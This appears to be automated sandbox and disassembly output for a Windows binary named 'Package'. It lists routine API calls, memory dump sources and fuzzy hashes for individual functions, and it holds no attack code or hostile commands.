                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID: api-ms-
                                                                          • API String ID: 3177248105-2084034818
                                                                          • Opcode ID: 83e1a1e2cee9a47cea64666a5c005743393c68cb5e7d93f4038611ab371cc7a1
                                                                          • Instruction ID: a3f53f0510fc7e1d0c5b6cd44f50a8263df8aaeafe1eabe8ff89129bfe14008f
                                                                          • Opcode Fuzzy Hash: 83e1a1e2cee9a47cea64666a5c005743393c68cb5e7d93f4038611ab371cc7a1
                                                                          • Instruction Fuzzy Hash: BFE012712C820AF7FF105AA1DC29F4A7E679B01751F308424F90DE8495DBA1A452D964
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00D2B468
                                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00D2B479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                                          • API String ID: 1646373207-3460614246
                                                                          • Opcode ID: f208dfab69cd189c5778b910a71a10dc24e6a24a3fe5a178e7dd09f27b6f6962
                                                                          • Instruction ID: f75139eea3a6dadb4bea1b0cfcafde36d4e70f640674ec717464d7613a32a06a
                                                                          • Opcode Fuzzy Hash: f208dfab69cd189c5778b910a71a10dc24e6a24a3fe5a178e7dd09f27b6f6962
                                                                          • Instruction Fuzzy Hash: 4DD05E78B057716BDB602BF17C4DF7B2EDD9B21BA97094411BA05D2290CEA0CC8186B1
                                                                          APIs
                                                                          • GetConsoleOutputCP.KERNEL32(7763BC5F,00000000,00000000,?), ref: 6E2FAEEA
                                                                            • Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E2FB13C
                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E2FB182
                                                                          • GetLastError.KERNEL32 ref: 6E2FB225
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                          • String ID:
                                                                          • API String ID: 2112829910-0
                                                                          • Opcode ID: 5326e144761edf7d134fd9f09a2d04ced4c2eb4c19bc7c06cb9dd23beae490e8
                                                                          • Instruction ID: af6bca18ab9294ffa7e4310d348297a4a3592c0caf747357d8fc94bb5d7b5169
                                                                          • Opcode Fuzzy Hash: 5326e144761edf7d134fd9f09a2d04ced4c2eb4c19bc7c06cb9dd23beae490e8
                                                                          • Instruction Fuzzy Hash: F4D17CB5D4424DDFDB01CFE8D890AEDFBBAEF09314F24456AE426EB245D630A942CB50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer
                                                                          • String ID:
                                                                          • API String ID: 1740715915-0
                                                                          • Opcode ID: ffc3e864152337fd014b3a71f7b6f5d048a1306717f1c00616d1b17aa5ebb120
                                                                          • Instruction ID: 8f73c845bd52d044619e17ecd85ecd7b8163e949cf5a119a0d97b8c468fef2da
                                                                          • Opcode Fuzzy Hash: ffc3e864152337fd014b3a71f7b6f5d048a1306717f1c00616d1b17aa5ebb120
                                                                          • Instruction Fuzzy Hash: D051D27658520FEFEB158F94C958BABF3A6FF00311F14052DD91587290E731E882CB92
                                                                          APIs
                                                                          • #861.MFC42U(?,00000001), ref: 00D339C4
                                                                          • #6325.MFC42U(?,00000001,00000000), ref: 00D33A4F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6325#861
                                                                          • String ID:
                                                                          • API String ID: 3876780826-0
                                                                          • Opcode ID: e20dc983ab6cf1f6cca41c0088d7032b91746931470dcbb753cac106b1ebf096
                                                                          • Instruction ID: fc04dd687bb9d947565fc199be755f2813c4b7d46f3b7a3a3a00c5656214bd7d
                                                                          • Opcode Fuzzy Hash: e20dc983ab6cf1f6cca41c0088d7032b91746931470dcbb753cac106b1ebf096
                                                                          • Instruction Fuzzy Hash: DF41FD71A10208EFCB01DF98D981BADBBB2FF49314F244099E805AB391C7B1AE40CF64
                                                                          APIs
                                                                            • Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65
                                                                          • GetLastError.KERNEL32 ref: 6E2F6B0A
                                                                          • __dosmaperr.LIBCMT ref: 6E2F6B11
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 6E2F6B4B
                                                                          • __dosmaperr.LIBCMT ref: 6E2F6B52
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1913693674-0
                                                                          • Opcode ID: d492b2477435b8955a2483167f26fca0b47fe9f0187da530184c5fb7b88071c3
                                                                          • Instruction ID: df38ba5cf749b9f8e1a87e9ae625e3be476aa30d0d9c83f09feac82eeb447369
                                                                          • Opcode Fuzzy Hash: d492b2477435b8955a2483167f26fca0b47fe9f0187da530184c5fb7b88071c3
                                                                          • Instruction Fuzzy Hash: F9215E716A461EEF97119FE5C8D0C5AF7AFEF053657008968E81697240DB71EC128BE0
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6E2F7DAF
                                                                            • Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2F7DE7
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2F7E07
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 158306478-0
                                                                          • Opcode ID: 41e25ba5572c9da3f666010b6a1ec18da03ae89293524b24a4b1d50367276c78
                                                                          • Instruction ID: 950fe9bfcf592a3a5ba19b95c1517ffa91336eb727a7ac67f0b0aa41956d4c7d
                                                                          • Opcode Fuzzy Hash: 41e25ba5572c9da3f666010b6a1ec18da03ae89293524b24a4b1d50367276c78
                                                                          • Instruction Fuzzy Hash: 9111E1B65A591EFF6B0216F69C9DCAFAA6FDE466A8710042AF402D1184EF60CD0281B0
                                                                          APIs
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,00000000,00000000,00000000,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C83D
                                                                          • GetAce.ADVAPI32(?,00000000,?,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C854
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C86C
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C88F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInformationLast
                                                                          • String ID:
                                                                          • API String ID: 3635006208-0
                                                                          • Opcode ID: 006eee0fbeb803a5a47c35d5ee08592c8b385ea348c45a69bbe077a9b20587cc
                                                                          • Instruction ID: 9913aa6af524c05f4b63dd9807a5ec81dc5ae49ee2e3329f327c262687be6da0
                                                                          • Opcode Fuzzy Hash: 006eee0fbeb803a5a47c35d5ee08592c8b385ea348c45a69bbe077a9b20587cc
                                                                          • Instruction Fuzzy Hash: DE119A71710215ABDB20EFAA9C45BBBB7ACBF46B50F141129B915F6280EA30DA01D7B0
                                                                          APIs
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00D3743B
                                                                          • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D3745D
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D37496
                                                                          • RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00D374C9
                                                                          • CLSIDFromString.OLE32(00000000,-00000008), ref: 00D37570
                                                                          • wcstol.MSVCRT ref: 00D37610
                                                                          • wcsrchr.MSVCRT ref: 00D3762C
                                                                          • wcstol.MSVCRT ref: 00D37650
                                                                          • wsprintfW.USER32 ref: 00D37696
                                                                          • wsprintfW.USER32 ref: 00D376B9
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D37743
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00D37754
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnumwcstolwsprintf$FromOpenQueryStringValuewcsrchr
                                                                          • String ID:
                                                                          • API String ID: 1473628064-0
                                                                          • Opcode ID: bcbb75c605d76316caa080ebaa396d90b6b77c8d33c263ace3ae8da9aad895ea
                                                                          • Instruction ID: fc69d9b9a31135f04c31ba9b61281db04ab0aa1c1fac39d169b2fac6f567f7b8
                                                                          • Opcode Fuzzy Hash: bcbb75c605d76316caa080ebaa396d90b6b77c8d33c263ace3ae8da9aad895ea
                                                                          • Instruction Fuzzy Hash: FD217DB1D086289BEB759B60CC84BE9B7B8EB14305F1401E9E60DA6150D779AF84EF60
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2CEE9
                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D2CF05
                                                                          • #3297.MFC42U(00000000,00000001,?,00000028), ref: 00D2CF30
                                                                          • #2637.MFC42U(00000001,00000000,00000001,?,00000028), ref: 00D2CF39
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2637#3297
                                                                          • String ID:
                                                                          • API String ID: 837686103-0
                                                                          • Opcode ID: 73297cf06c9f2eda92720930f30e9d3c28ea2ec61ade2ae8781e194ff6cdc28c
                                                                          • Instruction ID: 8edbca7bad3ad7f6e1324d46b1b83b7c4a3fd6addd7d50916af499e17f1e56ca
                                                                          • Opcode Fuzzy Hash: 73297cf06c9f2eda92720930f30e9d3c28ea2ec61ade2ae8781e194ff6cdc28c
                                                                          • Instruction Fuzzy Hash: A9F0C2323513257BE2205A61DC8AFABBB5AFB91B65F054021FA05AA0C1C7E1AC5183F1
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000000,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CAF9
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB00
                                                                          • GetLastError.KERNEL32(?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB0A
                                                                            • Part of subcall function 00D3CB3B: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00D3CB28,00000000,00000000,?), ref: 00D3CB71
                                                                            • Part of subcall function 00D3CB3B: GetLastError.KERNEL32(?,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB77
                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB2D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 1647960853-0
                                                                          • Opcode ID: fefe929d4b78958a82cfbf716a1a00af105470111252ac7d3344306cb5b1fc30
                                                                          • Instruction ID: f7865b1bbc21c5bceca47d718cf7bb9ee78fbc1bfb498d4d9f74917df9731c57
                                                                          • Opcode Fuzzy Hash: fefe929d4b78958a82cfbf716a1a00af105470111252ac7d3344306cb5b1fc30
                                                                          • Instruction Fuzzy Hash: 6CF0AF76A10215EBCB109FB5CC0ABABBBB8FF95750F144125B945E7210EA30CD40DBB0
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00D43B00,?,?,00D2B731,00D43998), ref: 00D3F268
                                                                          • LeaveCriticalSection.KERNEL32(00D43B00,?,?,00D2B731,00D43998), ref: 00D3F29B
                                                                          • SetEvent.KERNEL32(00000000,00D2B731,00D43998), ref: 00D3F32B
                                                                          • ResetEvent.KERNEL32 ref: 00D3F337
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalEventSection$EnterLeaveReset
                                                                          • String ID:
                                                                          • API String ID: 3553466030-0
                                                                          • Opcode ID: e454a45674fc9dd6209288b07daf856a097ada09f08918e7c4878069b84bc80a
                                                                          • Instruction ID: d02f6cd87a4fef6031a820f64ffe464dd485d34e78953b16c700f162321d04b8
                                                                          • Opcode Fuzzy Hash: e454a45674fc9dd6209288b07daf856a097ada09f08918e7c4878069b84bc80a
                                                                          • Instruction Fuzzy Hash: 38012839A007A4DBCB049F5CFC58E957BA4FB4B351B050029F906D7320CB30AA90CBB4
                                                                          APIs
                                                                          • #6330.MFC42U(00000001), ref: 00D2EEC9
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2EEDE
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2EEF2
                                                                          • #2634.MFC42U(00000001), ref: 00D2EF13
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2634#6330
                                                                          • String ID:
                                                                          • API String ID: 3857549013-0
                                                                          • Opcode ID: 812eb46cc81d224ecce5c10caba85fc270b3149db4c4c2808f94afb4566dc13b
                                                                          • Instruction ID: 072756e6853975a84fd35270be295e80ab8bddc3b4885a1d035569d5c92be0c6
                                                                          • Opcode Fuzzy Hash: 812eb46cc81d224ecce5c10caba85fc270b3149db4c4c2808f94afb4566dc13b
                                                                          • Instruction Fuzzy Hash: 94F08C301006586BEA325632EE89F9BBBBADBD3755F510419F109860A287715C81C670
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E41E
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E436
                                                                            • Part of subcall function 00D2E583: #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
                                                                            • Part of subcall function 00D2E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669
                                                                          • SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00D2E451
                                                                          • #6211.MFC42U(00000000), ref: 00D2E45E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#6211$RedrawWindow
                                                                          • String ID:
                                                                          • API String ID: 1685024686-0
                                                                          • Opcode ID: 6a0197df17837543b6d531e12dac6e428ae6d6d9f13f4bfb8c286ceed3cacefc
                                                                          • Instruction ID: 8d42110840b9d4761a69f83f990651f52deb4f5cd027b2a448602970c0698d02
                                                                          • Opcode Fuzzy Hash: 6a0197df17837543b6d531e12dac6e428ae6d6d9f13f4bfb8c286ceed3cacefc
                                                                          • Instruction Fuzzy Hash: 2CF03035104A507BEA312B22EC1DEC76EBDEBC7B15F06001CB21ED20A08B646941CAB0
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D2C6C5
                                                                          • SetCursor.USER32(00000000), ref: 00D2C6CC
                                                                            • Part of subcall function 00D2C6F3: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C722
                                                                            • Part of subcall function 00D2C6F3: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C78D
                                                                            • Part of subcall function 00D2C6F3: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C79D
                                                                            • Part of subcall function 00D2C6F3: #2634.MFC42U(00000001,?,?,?,?), ref: 00D2C7C8
                                                                            • Part of subcall function 00D2C6F3: #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00D2C7D4
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D2C6DF
                                                                          • SetCursor.USER32(00000000), ref: 00D2C6E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$MessageSend$#2634Load
                                                                          • String ID:
                                                                          • API String ID: 1037744270-0
                                                                          • Opcode ID: 0554848764724c358a79d4c7dbf600f15e694de5e4563a78d3bd5e3331cb2da2
                                                                          • Instruction ID: 86fd74ff41fb3022abd9f0c15e2eabb3ee7c6de91b4c7a70bd4667ca62f45125
                                                                          • Opcode Fuzzy Hash: 0554848764724c358a79d4c7dbf600f15e694de5e4563a78d3bd5e3331cb2da2
                                                                          • Instruction Fuzzy Hash: A1E0A936600320AB8701AFE1AC49A8B7B5CEF873513000022BA06DA202CBB86807C6F0
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000), ref: 6E2FCC3D
                                                                          • GetLastError.KERNEL32(?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?,?,?,6E2FB81C,00000000), ref: 6E2FCC49
                                                                            • Part of subcall function 6E2FCC0F: CloseHandle.KERNEL32(FFFFFFFE,6E2FCC59,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?,?), ref: 6E2FCC1F
                                                                          • ___initconout.LIBCMT ref: 6E2FCC59
                                                                            • Part of subcall function 6E2FCBD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E2FCC00,6E2FC3C5,?,?,6E2FB279,?,00000000,00000000,?), ref: 6E2FCBE4
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?), ref: 6E2FCC6E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: 6f08df75f9d9ee66d46de25e8d45dbd59b1d6979858362001606c1b99bfba8a0
                                                                          • Instruction ID: 16530a203a84b065dd8973a6dfa84d3ed65c255eb70949d0f61ab6d941bd80bf
                                                                          • Opcode Fuzzy Hash: 6f08df75f9d9ee66d46de25e8d45dbd59b1d6979858362001606c1b99bfba8a0
                                                                          • Instruction Fuzzy Hash: 78F0303609051DFBDF121FD5DC0999A7F6BFF0ABB1B288414FA1989520C7328861DBB5
                                                                          APIs
                                                                          • #2294.MFC42U(?,0000009E,?), ref: 00D2D907
                                                                          • #2294.MFC42U(?,00000076,?,?,0000009E,?), ref: 00D2D918
                                                                          • #2294.MFC42U(?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00D2D929
                                                                          • #2294.MFC42U(?,0000007E,?,?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00D2D93A
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2294
                                                                          • String ID:
                                                                          • API String ID: 314497554-0
                                                                          • Opcode ID: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
                                                                          • Instruction ID: 789f076bb4d3774c68d56606ba45c1f536ffd5f8a0539b0d3f8efd1ee2b52ec1
